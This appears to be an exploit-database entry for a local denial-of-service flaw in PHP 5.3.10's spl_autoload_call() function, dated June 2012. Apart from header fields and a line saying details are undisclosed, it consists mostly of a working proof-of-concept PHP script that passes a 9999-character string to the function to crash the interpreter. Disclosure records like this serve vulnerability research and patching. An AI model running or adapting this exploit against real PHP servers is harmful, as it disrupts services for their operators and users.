PHP 5.3.10 spl_autoload_call() Denial Of Service

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1047336 漏洞类型
发布时间 2012-06-04 更新时间 2012-06-04
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2012060026
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
<?php
#####################################################################
## PHP 5.3.10 spl_autoload_call() Local Denial of Service
## Tested on Windows 7 64bit, English, Apache, PHP 5.3.10
## Date: 02/06/2012
## Local Denial of Service
## Bug discovered by Pr0T3cT10n, <pr0t3ct10n@gmail.com>
## ISRAEL
## http://www.0x31337.net
#####################################################################
 
$buffer = str_repeat("A",9999);
spl_autoload_call($buffer);
?>